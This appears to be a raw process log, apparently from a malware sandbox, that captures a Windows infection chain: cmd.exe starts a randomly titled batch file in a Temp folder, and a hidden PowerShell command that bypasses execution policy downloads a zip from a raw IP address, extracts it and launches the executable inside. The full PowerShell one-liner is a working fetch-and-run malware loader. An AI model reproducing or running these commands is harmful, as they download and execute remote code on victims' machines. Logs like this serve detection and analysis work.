cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NoOupPXxvOfRNp" C:\Users\test22\AppData\Local\Temp\bloodengineer.bat
1648powershell.exe powershell -w hidden -ep Bypass -nop -c iwr -Uri http://195.82.147.81/abacfa/032625-log/bloodengineer.zip -OutFile $env:TEMP\bloodengineer.zip; Expand-Archive -Path "$env:TEMP\bloodengineer.zip" -DestinationPath $env:TEMP; cd $env:TEMP\bloodengineer; Start-Process -FilePath .\bloodengineer.exe
2160